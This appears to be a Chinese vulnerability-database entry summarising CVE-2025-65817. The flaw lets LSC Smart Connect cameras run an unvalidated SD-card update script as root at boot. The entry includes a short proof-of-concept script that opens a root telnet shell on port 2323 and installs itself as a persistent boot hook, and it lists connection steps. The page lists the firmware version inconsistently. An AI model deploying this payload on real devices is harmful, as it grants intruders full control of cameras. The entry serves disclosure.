# N/A
## 概述
LSC Smart Connect Indoor IP Camera 版本 1.4.13 存在一个远程代码执行(RCE)漏洞。
## 影响版本
- **版本**: 1.4.13
## 细节
- **漏洞文件**: `start_app.sh`
- **漏洞类型**: 远程代码执行(RCE)
- 该漏洞存在于启动脚本 `start_app.sh` 中,攻击者可能通过构造恶意输入在目标设备上执行任意代码。
## 影响
成功利用该漏洞可使攻击者获得对 IP 摄像机的远程控制权限,可能导致敏感信息泄露、设备操控或网络进一步攻击。
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|---|---|---|
| 1 | Here is the CVE-2025-65817 | https://github.com/Istaarkk/CVE-2025-65817 | POC详情 |
标题: CVE-2025-65817/README.md at main · Istaarkk/CVE-2025-65817 · GitHub -- 🔗来源链接
标签:
神龙速读:
## CVE-2025-65817
### Key Information about the Vulnerability
- **Title**: Vulnerability Report: LSC Smart Connect Camera
- **Date**: 2024-02-15
- **Description**: Abusing the SD-card update hook to spawn remote shells on LSC Smart Connect cameras.
- **Tags**: iot, vulnerability, cve
- **Firmware**: 1.14.13
### Vulnerability Details
- The vulnerability exploits the update system in `start_app.sh` via the SD card mount and the `update.nor.sh` file.
### Attack Vector
- An attacker can place a malicious `update.nor.sh` script on the SD card.
- This script is blindly trusted by the system and executed with root privileges during the boot process.
- No validation is performed on the script's contents, integrity, permissions, or ownership.
### Exploit Execution
- The malicious script is marked executable and run as root, executing with the SD card's mount point as an argument.
- This occurs before the main `ipc_service` starts, giving the script access to networking utilities, watchdog functions, and upgrade helpers.
### Available Utilities for Exploitation
- The camera provides various utilities including `busybox`, `sh`, `telnetd`, `swapoff`, `syslogd`, `tail`, `tar`, `tcpsvd`, `telnetd`, etc.
### Exploit and Proof of Concept
1. **Exploit Script**:
```sh
#!/bin/sh
telnetd -l /bin/sh -p 2323 &
echo "Telnet start by update.nor.sh" > /tmp/exploit_success
cp /mnt/update.nor.sh /mnt/config/hook-boot.sh
date > /tmp/exploit_time
```
2. **Verification**:
- Confirm that the telnet port 2323 is open using `netstat -tual`.
- Connect via telnet to exploit the device.
- Successful exploitation results in a root shell.
### Conclusion
This vulnerability allows remote attackers to gain full control over LSC Smart Connect cameras by exploiting a flawed update mechanism.
暂无评论